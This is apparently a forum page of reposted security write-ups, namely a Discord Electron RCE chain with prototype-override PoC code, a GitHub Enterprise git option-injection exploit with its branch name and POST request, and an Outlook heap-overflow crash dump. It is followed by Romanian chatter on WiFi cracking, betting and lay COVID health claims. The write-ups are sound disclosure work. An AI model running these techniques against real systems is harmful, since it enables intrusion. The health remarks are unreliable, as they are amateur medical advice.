Nytro

CVE-2020-16898 PoC BSOD for CVE-2020-16898 (badneighbor) Tested against Windows 10 version 2004 Sursa: https://github.com/0xeb-bp/cve-2020-16898

MKSB(en) Masato Kinugawa's Security Blog / @kinugawamasato Saturday, October 17, 2020 Discord Desktop app RCE A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Program. The RCE I found was an interesting one because it is achieved by combining multiple bugs. In this article, I'd like to share the details. Why I chose Discord for the target I kind of felt like finding for vulnerabilities of the Electron app, so I was looking for a bug bounty program which pays the bounty for an Electron app and I found Discord. Also, I am a Discord user and simply wanted to check if the app I'm using is secure, so I decided to investigate. Bugs I found Basically I found the following three bugs and achieved RCE by combining them. Missing contextIsolation XSS in iframe embeds Navigation restriction bypass (CVE-2020-15174) I'll explain these bugs one by one. Missing contextIsolation When I test Electron app, first I always check the options of the BrowserWindow API, which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible. The Discord's Electron app is not an open source project but the Electron's JavaScript code is saved locally with the asar format and I was able to read it just by extracting it. In the main window, the following options are used: const mainWindowOptions = { title: 'Discord', backgroundColor: getBackgroundColor(), width: DEFAULT_WIDTH, height: DEFAULT_HEIGHT, minWidth: MIN_WIDTH, minHeight: MIN_HEIGHT, transparent: false, frame: false, resizable: true, show: isVisible, webPreferences: { blinkFeatures: 'EnumerateDevices,AudioOutputDevices', nodeIntegration: false, preload: _path2.default.join(__dirname, 'mainScreenPreload.js'), nativeWindowOpen: true, enableRemoteModule: false, spellcheck: true } }; The important options which we should check here are especially nodeIntegration and contextIsolation. From the above code, I found that the nodeIntegration option is set to false and the contextIsolation option is set to false (the default of the used version) in the Discord's main window. If the nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling the require(). For example, the way to execute the calc application on Windows is: <script> require('child_process').exec('calc'); </script> In this time, the nodeIntegration was set to false, so I couldn't use Node.js features by calling the require() directly. However, there is still a possibility of access to Node.js features. The contextIsolation, another important option, was set to false. This option should not be set to false if you want to eliminate the possibility of RCE on your app. If the contextIsolation is disabled, a web page's JavaScript can affect the execution of the Electron's internal JavaScript code on the renderer, and preload scripts (In the following, these JavaScript will be referred to as the JavaScript code outside web pages). For example, if you override Array.prototype.join, one of the JavaScript built-in methods, with another function from a web page's JavaScript, the JavaScript code outside web pages also will use the overridden function when the join is called. This behavior is dangerous because Electron allows the JavaScript code outside web pages to use the Node.js features regardless the nodeIntegration option and by interfering with them from the function overridden in the web page, it could be possible to achieve RCE even if the nodeIntegration is set to false. By the way, a such trick was previously not known. It was first discovered in a pentest by Cure53, which I also joined in, in 2016. After that, we reported it to Electron team and the contextIsolation was introduced. Recently, that pentest report was published. If you are interested, you can read it from the following link: Pentest-Report Ethereum Mist 11.2016 - 10.2017 https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view You can also read the slides which I used at a CureCon event: The contextIsolation introduces the separated contexts between the web page and the JavaScript code outside web pages so that the JavaScript execution of each code does not affect each. This is a necessary faeture to eliminate the possibility of RCE, but this time it was disabled in Discord. Now I found that the contextIsolation is disabled, so I started looking for a place where I could execute arbitrary code by interfering with the JavaScript code outside web pages. Usually, when I create a PoC for RCE in the Electron's pentests, I first try to achieve RCE by using the Electron's internal JavaScript code on the renderer. This is because the Electron's internal JavaScript code on the renderer can be executed in any Electron app, so basically I can reuse the same code to achieve RCE and it's easy. In my slides, I introduced that RCE can be achieved by using the code which Electron executes at the navigation timing. It's not only possible from that code but there are such code in some places. (I'd like to publish examples of the PoC in the future.) However, depending on the version of Electron used, or the BrowserWindow option which is set, because the code has been changed or the affected code can't be reached correctly, sometimes PoC via the Electron's code does not work well. In this time, it did not work, so I decided to change the target to the preload scripts. When checking the preload scripts, I found that Discord exposes the function, which allows some allowed modules to be called via DiscordNative.nativeModules.requireModule('MODULE-NAME'), into the web page. Here, I couldn't use modules that can be used for RCE directly, such as child_process module, but I found a code where RCE can be achieved by overriding the JavaScript built-in methods and interfering with the execution of the exposed module. The following is the PoC. I was able to confirm that the calc application is popped up when I call the getGPUDriverVersions function which is defined in the module called "discord_utils" from devTools, while overriding the RegExp.prototype.test and Array.prototype.join. RegExp.prototype.test=function(){ return false; } Array.prototype.join=function(){ return "calc"; } DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions(); The getGPUDriverVersions function tries to execute the program by using the "execa" library, like the following: module.exports.getGPUDriverVersions = async () => { if (process.platform !== 'win32') { return {}; } const result = {}; const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`; try { result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, [])); } catch (e) { result.nvidia = {error: e.toString()}; } return result; }; Usually the execa tries to execute "nvidia-smi.exe", which is specified in the nvidiaSmiPath variable, however, due to the overridden RegExp.prototype.test and Array.prototype.join, the argument is replaced to "calc" in the execa's internal processing. Specifically, the argument is replaced by changing the following two parts. https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36 https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55 The remaining work is to find a way to execute JavaScript on the application. If I can find it, it leads to actual RCE. XSS in iframe embeds As explained above, I found that RCE could happen from arbitrary JavaScript execution, so I was trying to find an XSS vulnerability. The app supports the autolink or Markdown feature, but looked like it is good. So I turned my attention to the iframe embeds feature. The iframe embeds is the feature which automatically displays the video player on the chat when the YouTube URL is posted, for example. When the URL is posted, Discord tries to get the OGP information of that URL and if there is the OGP information, it displays the page's title, description, thumbnail image, associated video and so on in the chat. The Discord extracts the video URL from the OGP and only if the video URL is allowed domain and the URL has actually the URL format of the embeds page, the URL is embedded in the iframe. I couldn't find the documentation about which services can be embedded in the iframe, so I tried to get a hint by checking the CSP's frame-src directive. At that time, the following CSP was used: Content-Security-Policy: [...] ; frame-src https://*.youtube.com https://*.twitch.tv https://open.spotify.com https://w.soundcloud.com https://sketchfab.com https://player.vimeo.com https://www.funimation.com https://twitter.com https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://js.stripe.com https://assets.braintreegateway.com https://checkout.paypal.com https://*.watchanimeattheoffice.com Obviously, some of them are listed to allow iframe embeds (e.g. YouTube, Twitch, Spotify). I tried to check if the URL can be embeded in the iframe by specifying the domain into the OGP information one by one and tried to find XSS on the embedded domains. After some attempts, I found that the sketchfab.com, which is one of the domains listed in the CSP, can be embedded in the iframe and found XSS on the embeds page. I didn't know about Sketchfab at that time, but it seems that it is a platform in which users can publish, buy and sell 3D models. There was a simple DOM-based XSS in the footnote of the 3D model. The following is the PoC, which has the crafted OGP. When I posted this URL to the chat, the Sketchfab was embedded into the iframe on the chat, and after a few clicks on the iframe, arbitrary JavaScript was executed. https://l0.cm/discord_rce_og.html <head> <meta charset="utf-8"> <meta property="og:title" content="RCE DEMO"> [...] <meta property="og:video:url" content="https://sketchfab.com/models/2b198209466d43328169d2d14a4392bb/embed"> <meta property="og:video:type" content="text/html"> <meta property="og:video:width" content="1280"> <meta property="og:video:height" content="720"> </head> Okay, finally I found an XSS, but the JavaScript is still executed on the iframe. Since Electron doesn't load the "JavaScript code outside web pages" into the iframe, so even if I override the JavaScript built-in methods on the iframe, I can't interfere with the Node.js' critical parts. To achieve RCE, we need to get out of the iframe and execute JavaScript in a top-level browsing context. This requires opening a new window from the iframe or navigating the top window to another URL from the iframe. I checked the related code and I found the code to restrict navigations by using "new-window" and "will-navigate" event in the code of the main process: mainWindow.webContents.on('new-window', (e, windowURL, frameName, disposition, options) => { e.preventDefault(); if (frameName.startsWith(DISCORD_NAMESPACE) && windowURL.startsWith(WEBAPP_ENDPOINT)) { popoutWindows.openOrFocusWindow(e, windowURL, frameName, options); } else { _electron.shell.openExternal(windowURL); } }); [...] mainWindow.webContents.on('will-navigate', (evt, url) => { if (!insideAuthFlow && !url.startsWith(WEBAPP_ENDPOINT)) { evt.preventDefault(); } }); I thought this code can correctly prevent users from opening the new window or navigating the top window. However, I noticed the unexpected behavior. Navigation restriction bypass (CVE-2020-15174) I thought the code is okay but I tried to check that the top navigation from the iframe is blocked anyway. Then, surprisingly, the navigation was not blocked for some reason. I expected that the attempt is catched by the "will-navigate" event before the navigation happens and refused by the preventDefault(), but is not. To test this behavior, I created a small Electron app. And I found that the "will-navigate" event is not emitted from the top navigation started from an iframe for some reason. To be exact, if the top's origin and iframe's origin is in the same-origin, the event is emitted but if it is in the different origin, the event is not emitted. I didn't think that there is a a legitimate reason for this behavior, so I thought this is an Electron's bug and decided to report to Electron team later. With the help of this bug, I was able to bypass the navigation restriction. The last thing I should do is just a navigation to the page which contains the RCE code by using the iframe's XSS, like top.location="//l0.cm/discord_calc.html". In this way, by combining with three bugs, I was able to achieve RCE as shown in the video below. In the end These issues were reported through Discord's Bug Bounty Program. First, Discord team disabled the Sketchfab embeds, and a workaround was taken to prevent navigation from the iframe by adding the sandbox attribute to the iframe. After a while, the contextIsolation was enabled. Now even if I could execute arbitrary JavaScript on the app, RCE does not occur via the overridden JavaScript built-in methods. I received $5,000 as a reward for this discovery. The XSS on Sketchfab was reported through Sketchfab's Bug Bounty Program and fixed by Sketchfab developers quickly. I received $300 as a reward for this discovery. The bug in the "will-navigate" event was reported as a bug of Electron to Electron's security team, and it was fixed as the following vulnerability (CVE-2020-15174). Unpreventable top-level navigation · Advisory · electron/electron https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674 That's it. Personally, I like that the external page's bug or Electron's bug, which is unrelated to the app itself's implementation, led to RCE I hope this article helps you keep your Electron apps secure. Thanks for reading! Posted by Masato Kinugawa Sursa: https://mksben.l0.cm/2020/10/discord-desktop-rce.html

GitHub - RCE via git option injection (almost) - $20,000 Bounty Oct 18, 2020 It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling there are lots of scripts available to decode it leaving you with regular ruby files for a rails app. The last bug I submitted to GitHub was around a year ago. It was to do with injecting options into the git command using branch names that started with a - allowing an attacker to truncate files on the server, so I decided that was a good place to start to see if any similar bugs had been introduced. Discovery I began searching for all the places that the git process was called, then tracing the arguments back to see if they were user controllable and if they were sanitised correctly. Most places either put user controlled data behind -- in the command so that it is never parsed as an option, or there was a check to make sure that it is a valid sha1 or commitish value and doesn’t start with a -. After a while I came across a method reverse_diff which took two commits and ended up running a git diff-tree with them, and the only check was that there were both valid git references for the repo (sha, branch, tag, etc). Tracing backwards, this function was called by a revert_range method which was used when reverting between two previous wiki commits. So a POST to user/repo/wiki/Home/_revert/57f931f8839c99500c17a148c6aae0ee69ded004/1967827bcd890246b746a5387340356d0ac7710a would end up calling reverse_diff with the values 57f931f8839c99500c17a148c6aae0ee69ded004 and 1967827bcd890246b746a5387340356d0ac7710a. This looked perfect! I checked out a repo and pushed a new branch called --help with git push origin master:--help, then tried to post to user/repo/wiki/Home/_revert/HEAD/--help. But instead of success a 422 Unprocessable Entity was returned. Looking at the server logs it was complaining that the CSRF token was invalid. Turns out that rails now has per form CSRF tokens that are generated based on the path that you are posting to. Query parameters aren’t checked, but in this case the route was setup to only allow path params for the commits. The form for the revert along with the valid token was generated by the wiki compare template, but unfortunately that had a much stricter validation and required the commits to be valid sha hashes. This meant that I couldn’t get it to render a valid form and token for the --help branch, only for valid commit shas. Digging into the valid_authenticity_token? method in rails, another way to bypass the per form CSRF is by using the global token, as there is a code path to make existing forms backwards compatible while transitioning. def valid_authenticity_token?(session, encoded_masked_token) # :doc: if encoded_masked_token.nil? || encoded_masked_token.empty? || !encoded_masked_token.is_a?(String) return false end begin masked_token = Base64.strict_decode64(encoded_masked_token) rescue ArgumentError # encoded_masked_token is invalid Base64 return false end # See if it's actually a masked token or not. In order to # deploy this code, we should be able to handle any unmasked # tokens that we've issued without error. if masked_token.length == AUTHENTICITY_TOKEN_LENGTH # This is actually an unmasked token. This is expected if # you have just upgraded to masked tokens, but should stop # happening shortly after installing this gem. compare_with_real_token masked_token, session elsif masked_token.length == AUTHENTICITY_TOKEN_LENGTH * 2 csrf_token = unmask_token(masked_token) compare_with_real_token(csrf_token, session) || valid_per_form_csrf_token?(csrf_token, session) else false # Token is malformed. end end The global CSRF token is quite often handed out to the client using the csrf_meta_tags helper, but GitHub had really locked down everything and after a lot of searching the was no place that I could find that was leaking it. GitHub had even gone so far as raising an error if the per form CSRF was not setup correctly, as that could leak the global token. I spent quite a bit of time searching for a way to bypass this, the way the token was generated by rails it didn’t really matter where the form was created so long as I could get it to use a path such as wiki/Home/_revert/HEAD/--help. After a lot of searching and digging very deep within both GHE and rails code I came up empty handed. I did find a few archived html pages on github.com indicating that the global token used to be handed out just not any more. GitHub stores the global CSRF token for a user session in the database, so I decided to just grab it from there continue on and could come back to how to find it later. Exploit I installed and ran execsnoop from perf-tools on the GHE server to have a closer look at the exact git command that was run when doing a revert and saw that it was in the form git diff-tree -p -R commit1 commit2 -- Home.md. The diff-tree git command has an option --output allowing you to write the output to a file instead of outputting the results, so using HEAD as the first commit and --output=/tmp/ggg as the second would write the lastest diff of a file to /tmp/ggg. So I pushed a new branch called --output=/tmp/ggg to the wiki repo, then did a POST to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Ftmp%2Fggg using the authenticity_token I’d grabbed from the database. Looking on the server the file /tmp/ggg had been created with the output of the diff! 9ea5ef1f10e9ff1974055d3e4a60bec143822f9d diff --git b/Home.md a/Home.md index c3a38e1..85402bc 100644 --- b/Home.md +++ a/Home.md @@ -1,4 +1,3 @@ Welcome to the public wiki! -3 +2 The next thing to do was to work out what to do with it. The file could be written anywhere the git user had access to, and the content at the end of the file was fairly controllable. After a lot more searching I found a few writeable env.d directories (such as /data/github/shared/env.d) which contained some setup scripts. The files in these directories ended up being sourced when the services started up or when commands some were run: for i in $envdir/*.sh; do if [ -r $i ]; then . $i fi done Since doing a . script.sh doesn’t require the file to executable, and bash will continue running a script after it encounters errors, this meant that if the diff that was written contained some valid shell script then it would be executed! So now I had everything (kind of) that was required to exploit the bug. Grab a users CSRF token from the database Create a wiki page containing ; echo vakzz was here > /tmp/ggg Edit the wiki page and add a new line of text: # anything Clone the wiki repo Push a new branch name with our injected flag: git push origin master:--output=/data/failbotd/shared/env.d/00-run.sh Use burp or curl to post to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh using the authenticity_token from the database POST /user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: user_session=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Content-Length: 65 authenticity_token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3d Check the server to see that file has been created with our diff: $ cat /data/failbotd/shared/env.d/00-run.sh 69eb12b5e9969ec73a9e01a67555c089bcf0fc36 diff --git b/Home.md a/Home.md index 4a7b77c..ce38b05 100644 --- b/Home.md +++ a/Home.md @@ -1,2 +1 @@ -; echo vakzz was here > /tmp/ggg` -# anything \ No newline at end of file +; echo vakzz was here > /tmp/ggg` \ No newline at end of file Run the file that sources our diff and check it worked ./production.sh ./production.sh: 1: /data/failbotd/current/.app-config/env.d/00-run.sh: 69eb12b5e9969ec73a9e01a67555c089bcf0fc36: not found diff: unrecognized option '--git' diff: Try 'diff --help' for more information. ./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: index: not found ./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: ---: not found ./production.sh: 5: /data/failbotd/current/.app-config/env.d/00-run.sh: +++: not found ./production.sh: 6: /data/failbotd/current/.app-config/env.d/00-run.sh: @@: not found ./production.sh: 7: /data/failbotd/current/.app-config/env.d/00-run.sh: -: not found ./production.sh: 2: /data/failbotd/current/.app-config/env.d/00-run.sh: -#: not found ./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found ./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: +: not found ./production.sh: 11: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found $ cat /tmp/ggg vakzz was here At this stage I decided to report the issue to GitHub, even though I had no way to bypass the per form CSRF token. The underlying issue was still pretty critical, and it’s possible that GitHub could released a patch in the future that accidentally leaked the global token or change the route to accept query parameters which would open them up to being vulnerable. Within 15 minutes GitHub had triaged the bug and let me know that they were looking into it. A few hours later they responded again confirming the underlying issue and that they could not find a way to bypass the per form token, mentioning that it was a severe issue that they may had just been lucky with their CSRF setup. I sent through a summary of the methods I’d tried for bypassing the per form as well as potential spots that it might be possible to leak it, and confirmed that I thought it was pretty unlikely to be exploitable. So the bug itself was critical, but without it being exploitable I really had no idea how GitHub was going to land when deciding a bounty, or even if there would be a bounty at all. I ended up being very pleasantly surprised. Timeline July 25, 2020 01:48:02 AEST - Bug submitted via HackerOne July 25, 2020 02:05:21 AEST - Bug was triaged by GitHub July 25, 2020 09:18:28 AEST - Underlying issue was confirmed August 11, 2020 - GitHub Enterprise 2.21.4 released fixing the issue High: An attacker could inject a malicious argument into a Git sub-command when executed on GitHub Enterprise Server. This could allow an attacker to overwrite arbitrary files with partially user-controlled content and potentially execute arbitrary commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to access repositories within the GHES instance. However, due to other protections in place, we could not identify a way to actively exploit this vulnerability. This vulnerability was reported through the GitHub Security Bug Bounty program. September 11, 2020 02:52:15 AEST - $20,000 bounty awarded Sursa: https://devcraft.io/2020/10/18/github-rce-git-inject.html

CVE-2020-16947 This vulnerability occurs in Outlook 2019 (16.0.13231.20262) installed on Windows 10 1909 x64 TLDR; I found this bug usng winafl fuzzer. This bug occured when parsing html contents. if attacker successfully executes this exploit, it can lead to remote command execution. Details 0:000> r rax=0000000000000000 rbx=0000021c99ce9eb0 rcx=0000021c99ce9eb0 rdx=00000046c07f8a30 rsi=0000021cc85ac000 rdi=00000000ffffe000 rip=00007ffe69012f5b rsp=00000046c07f89f0 rbp=00000046c07f8a69 r8=00000046c07f8a28 r9=0000000000000041 r10=00007de1cf5e3124 r11=0000000000000000 r12=00000046c07f8b00 r13=0000021c99ce9f1c r14=0000000000000041 r15=00000000000003b5 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 OLMAPI32!HrGetMessageClassFromContentClassW+0xf80b: 00007ffe`69012f5b 448836 mov byte ptr [rsi],r14b ds:0000021c`c85ac000=?? 0:000> d rsi - 10 0000021c`c85abff0 ff fd ff fd ff fd ff fd-ff fd ff fd ff fd ff 41 ...............A 0000021c`c85ac000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0:000> !heap -p -a rsi address 0000021cc85ac000 found in _DPH_HEAP_ROOT @ 21ce0331000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 21ccb3eb000: 21cc85a7ff0 4010 - 21cc85a7000 6000 00007ffea238825b ntdll!RtlDebugAllocateHeap+0x000000000000003b 00007ffea22a9745 ntdll!RtlpAllocateHeap+0x00000000000000f5 00007ffea22a73d4 ntdll!RtlpAllocateHeapInternal+0x00000000000006d4 00007ffe68c8777d OLMAPI32!MAPIAllocateBuffer+0x00000000000000cd 00007ffe69012a35 OLMAPI32!HrGetMessageClassFromContentClassW+0x000000000000f2e5 00007ffe69015d34 OLMAPI32!HrTextFromCompressedRTFStreamEx+0x00000000000023d4 00007ffe68dcc776 OLMAPI32!RTFSyncCpid+0x0000000000000156 00007ffe7c3eb532 exsec32!HrExsec32Initialize+0x0000000000005372 00007ffe7c3e5631 exsec32+0x0000000000005631 00007ffe68dccc76 OLMAPI32!RTFSyncCpid+0x0000000000000656 00007ffe68de2ab4 OLMAPI32!HrCreateMHTMLConverter+0x0000000000002634 00007ffe68dd21a7 OLMAPI32!MlangIsConvertible+0x0000000000004a07 00007ffe68de299d OLMAPI32!HrCreateMHTMLConverter+0x000000000000251d 00007ffe7c42748f exsec32!DllUnregisterServer+0x00000000000002bf 00007ffe7c3eb418 exsec32!HrExsec32Initialize+0x0000000000005258 00007ffe7c3e5631 exsec32+0x0000000000005631 00007ffe551703d9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025539 00007ffe551709f9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025b59 00007ffe55174dec OUTLMIME!MimeOleInetDateToFileTime+0x0000000000029f4c 00007ffe55175279 OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a3d9 00007ffe55174ebe OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a01e 00007ffe7c41a8fc exsec32!HrMaxAlgStrength+0x0000000000004cac 00007ffe7c3eb017 exsec32!HrExsec32Initialize+0x0000000000004e57 00007ffe7c3ebf23 exsec32!HrExsec32Initialize+0x0000000000005d63 00007ffe49ac9f47 mso98win32client!Ordinal3621+0x00000000000000e7 00007ffe49ac9ecd mso98win32client!Ordinal3621+0x000000000000006d 00007ff7afc43f79 outlook!FEnableAMapProgress+0x000000000002f099 00007ff7afdb638d outlook!UpdateSharingAccounts+0x000000000007031d 00007ff7afdc3d85 outlook!IsOutlookOutsideWinMain+0x0000000000003af5 00007ff7afcf7727 outlook!HrGetDelegatorInfoSync+0x00000000000016e7 00007ff7afd2a2b0 outlook!GetOutlookSafeModeState+0x000000000000bd00 00007ff7afd2a14b outlook!GetOutlookSafeModeState+0x000000000000bb9b When copying strings out of the ascii range among html contents, the corresponding string is replaced with 0xfffd. As a result, the size of the copied string doubles, so despite the same size of the src buffer and dst buffer, buffer overflow occurs. Sursa: https://github.com/0neb1n/CVE-2020-16947

Da, ar fi mult mai practic, dar de cele mai multe ori nu e activat.

Salut, gasesti mai multe articole in categoria dedicata acestui subiect de pe forum: https://rstforums.com/forum/forum/30-wireless-pentesting/page/5/ Si sunt multe alte resurse disponibile pe Google/Youtube (cauta "WiFi WPA2 crack", cel mai probabil nu e WEP pe acolo). Problema ar fi ce placa de retea ai, daca o poti folosi pentru asa ceva. Incearca cateva tutoriale si vezi daca merge.

Nu prea sunt altele, adica in principiu orice compilator cross-platform poate compila C/C++ pentru alt sistem de operare cu parametrii corespunzatori. Poti folosi chiar si Visual Studio pentru asta: https://devblogs.microsoft.com/cppblog/linux-development-with-c-in-visual-studio/ Iar cu WSL (Windows Subsystem for Linux) poti chiar sa testezi mai usor binarele.

MinGW?

Am un var care juca (sau inca joaca) la pariuri, pe fotbal. Dar el joaca fotbal, a jucat in liga a 3-a si pe langa asta se uita la meciuri. La multe meciuri. Adica el stie si daca de la o echipa lipseste un jucator si cum au jucat in ultimele meciuri si o gramada de astfel de lucruri. Si castiga insa nu baga multi bani deci nu a facut o avere. Nu ai cum sa faci decat daca se fac blaturi si stii de ele. E o poveste publica, cineva care nu si-a dat identitatea, lucra ca nu mai stiu ce la o echipa de fotbal. Si cineva de acolo de la echipa il punea sa ii bage la pariuri, sume destul de mari. A vazut ca a castigat persoana respective, o data, de doua ori si a decis sa bage si el fix ce baga acea persoana. A facut o gramada de bani. Se faceau blaturi si uneori chiar scorul exact se stia de dinainte. Sugestia mea e sa nu va complicati cu asa ceva ca nu merita, deloc.

Mai sunt 2 saptamani pentru CFP (propunerile de prezentari), cine mai e interesat?

Probabil deoarece nu sunt tratamente propriu-zise ci doar pot ajuta cumva. Zincul ajuta sistemul imunitar iar azitromicina e un antibiotic care in mod normal nu e necesar deoarece antibioticele nu au niciun efect asupra virusurilor ci doar asupra bacteriilor. Este util desigur in situatiile in care apare o infectie (bacteriana) la nivelul plamanilor si sistemului respirator in general deoarece asta se poate intampla in infectia cu Covid.

Am inceput sa citesc din acea carte de Covid. E super tare, acopera extrem de multe lucruri, atat din punct de vedere medical cat si legat de gestionarea epidemiei, lucruri legate de politica, de religie si chiar de psihologie a populatiei. Cred ca acopera cam tot ce se poate. Din punct de vedere medical, nu e chiar atat de usor de inteles ce se explica acolo. Am prins si eu cateva idei. 1. Virusul SARS-Cov2 e format din ARN, proteina spike si glicoprotenia 2. Virusul se "leaga" de celulele pe care le infecteaza prin glicoproteniele (care ii dau forma de coroana si numele de coronavirus) 3. Aceste glicoproteina se leaga de celulele care au la suprafata receptori ACE2 (nu toate au, doar unele si e important de retinut acest aspect) 4. Spre deosebire de SARS-Cov (adica SARS din 2002) si MERS (din 2012), legatura este mai puternica si de aceea este mai contagios 5. Cauza probabila a penumoniilor e acea "furtuna de citokine" de care ati toti auzit. Cand o celula e infectata de catre un virus, aceasta elibereaza citokina. Aceasta activeaza interventia sistemului imunitar, rezultatul fiind atacarea alvelolelor din plamani care ne permit sa respiram 6. Se pare ca infecteaza si niste celule din sange (endoteliale) si ca asta favorizeaza aparitia cheagurilor de sange (prin coagulare) dar sincer sunt multi termeni medicali si nu inteles exact 7. Durerile de cap si musculare apar deoarece acolo sunt celule care prezinta receptori ACE2 de care virusul se poate atasa 8. Anosmia (pierderea gustului) si ageuzia (pierderea mirosului) sunt cele mai comune afectiuni ale sistemului nervos central periferic 9. Pierderea gusului si a mirosului apar in general la pacienti care in general ar avea simptome mai usoare (adica e de bine) 10. Persoanele purtatoare de virus au capacitatea de a-l raspandi! 11. Nervii olfactivi si tractul olfactiv prezinta receptori ACE2 si probabil de aceea exista aceste simptome 12. Celulele vasculare si artelere din creier prezinta receptori ACE2 si de aceea exista un risc crescut de atac cerebral. Eu ma gandesc ca si obezitatea e o problema din cauza subtierii vaselor de sange (din cauza grasimii) si a problemelor pe care le provoaca Covid: infectia celulelor vasculare si coaglarea sangelui + obezitate = nasol Ca tratament exista ceva solutii dar nu se gasesc in farmacii. Nu zice ceva legat de Redemsivir dar Melatonina pare ca poate ajuta si de asemenea (din alte surse cum ar fi tratamentul lui Trump) vitamina D si Zincul (foarte bun pentru sistemul imunitar) ar fi utile. Desigur, sunt si alte solutii ca dexametazona pentru pacientii in stare grava sau altele, dar sunt injectabile si nu se dau fara reteta si nu ar trebui nimeni sa se trateze singur. Clorochina nu s-a demonstrat ca ar ajuta cu ceva. Plasma convalescenta, adica plansma din sangele celor care au anticorpi, e probabil o foarte buna solutie. Doar sa doneze oamenii astia idioti care cred ca asta le ia imunitatea... Alte probleme specifice pot fi rezolvate cu medicamente specifice, cum ar fi o explozie a sistemului imunitar prin medicamente care inhiba actiunea sistemului imunitar. Cam asta ar fi din punct de vedere medical. Ce am inteles si eu, e posibil sa nu fii inteles totul cum trebuie mai ales ca terminologia e destul de complicata. Mai citesc si revin cu lucruri interesante. Chiar va recomand cartea! Edit: Nu are legatura cu Covid dar e legat de diabet. Un medic diabetolog live la Digi spune ca diabetul nu se face neaparat de la consum de zahar ci mai degraba de la stres, multa munca, sedentarisem, mancare nesanatoasa, fumat, alcool si ca probabil are si o cauza genetica (cica nu se stie exact cauza bolii). Si sugereaza sa mancam patrunjel, in general (mai multa vitamina C ca lamaia si mai mult fier ca spanacul). De asemenea sunt bune 2 pahare de vin rosu/negru pe zi (nu 2 sticle in weekend) deoarece ajuta la dilatarea vaselor de sange. Chimic, exista o substanta in struguri care le da culoarea rosie si care e activata doar in vin, nu in struguri simpli sau in must. Si ajuta si la buna-dispozitie (desi nu prea mult din cauza cantitatii limitate).

Da, nu are logica in prevenirea Covid, are doar logica din punct de vedere financiar. Daca stau 5 persoane la masa, 5 persoane platesc consumatia. Elevii nu platesc nimic. Nu conteaza, ajuta, orice ar fi. Si un fular (cu Dinamo, normal) si o esarfa si o bucata de mamaliga pusa la gura fac ca atunci cand persoana vorbeste sa nu se imprastie particule si nici sa nu ii ajunga asa usor in gura si in nas. Ganditi-va ca vorbiti cu o persoana care vorbeste cu scuipat. E vreo diferenta intre a vorbi cu acea persoana cu masca si fara masca? Eu zic ca da. Mastile medicinale sunt necesare cand e vorba de un spatiu inchis dar oricum trebuie purtate cum trebuie. Daca va uitati la medici vedeati ca ei nu isi pun mastile si gata, le "izoleaza" cu banda izolanta sau mai stiu eu ce, sa nu fie gauri pe langa. Asta e necesar cand in jurul tau vin zeci de persoane confirmate pozitiv. Daca ai parul lung si il bagi in gura, sau daca iti treci des mainile prin par si apoi le duci la ochi/nas/gura, da, are sens. La fel sta si pe haine si pe orice altceva. De aceea se tot insista cu spalatul pe maini, ca hainele si parul nu le bagi in gura, dar mainile da. Oricum ar fi nu poti preveni 100% asta, eu vad ca pun mainile pe cine stie unde apoi bag tigara in gura. Imi asum acest risc, sunt constient ca nu e ok, dar ma si spal pe maini cat de des pot. Din cate stiam eu sunt nerembursabile. Dar si daca ar fi, tot sunt necesare. Nu ai bani dar ai neaparat nevoie de ceva? Te imprumuti. In cacat, m-am saturat de imprumuturi doar pentru mariri de pensii sau mai stiu eu ce, din punctul meu de vedere e un motiv serios pentru imprumuturi si investitii in sistemul medical. Nu 